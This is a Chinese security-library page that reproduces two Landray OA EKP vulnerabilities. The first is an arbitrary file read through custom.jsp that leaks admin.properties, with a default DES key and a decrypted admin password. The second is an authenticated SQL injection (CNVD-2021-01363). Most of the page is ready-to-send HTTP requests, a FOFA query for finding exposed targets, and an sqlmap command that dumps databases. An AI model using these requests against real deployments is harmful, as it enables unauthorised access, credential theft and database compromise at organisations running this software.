蓝凌OA EKP后台密码读解密+SQL注入(CNVD-2021-01363)–Komorebi-漏洞文库小世界-安全文库-NGC660 安全实验室

蓝凌OA EKP后台密码读解密+SQL注入(CNVD-2021-01363)–Komorebi

后台密码读解密

漏洞描述

蓝凌OA(EKP)存在任意文件读取漏洞。可利用漏洞获取敏感信息,读取配置文件得到密码后访问后台

漏洞影响版本

蓝凌OA
FOFA
app=“Landray-OA系统”

漏洞复现

利用custom.jsp任意文件读取漏洞来读取配置文件
POST请求:

http://x.x.x.x/sys/ui/extend/varkind/custom.jsp

读取配置文件:

/WEB-INF/KmssConfig/admin.properties

此处需要写为如下格式:

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

Burp构造数据包

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: X.X.X.X
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

1627629011111-bb01808b-7959-43e3-8d4f-2edc462ee30d

接着可以将得到的密钥:

chuciDiIU2nhEz\/JLVTdUw==

拿去DES在线解密网站进行解密默认密钥:kmssAdminKey
在线解密网站:http://tool.chacuo.net/cryptdes

1627629041073-ed436f7a-6365-4fb3-bdd5-381571a6983e

登录系统

账户admin
密码abcABC123

1627629065179-21749f9c-d52e-45bf-8c81-fc2ea858c596

后台SQL注入 CNVD-2021-01363

影响版本

2021-3-24 前版本

漏洞复现

存在漏洞的URL

https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true

构造数据包(注意替换后台cookie)

GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=77CDA7F42BF28CB78E5AC84B8A560664

保存为此文件,使用sqlmap跑注入

sqlmap -r sql.txt -p orderby --dbs

1627629121401-5279df2e-7b9d-4b68-9e74-89df665eef91


参考文章

蓝凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363 | CN-SEC 中文网
http://cn-sec.com/archives/299683.html 蓝凌OA后台密码读解密+POC – Chen-w – 博客园
https://www.cnblogs.com/chen-w/p/14884175.html

请登录后发表评论

    请登录后查看回复内容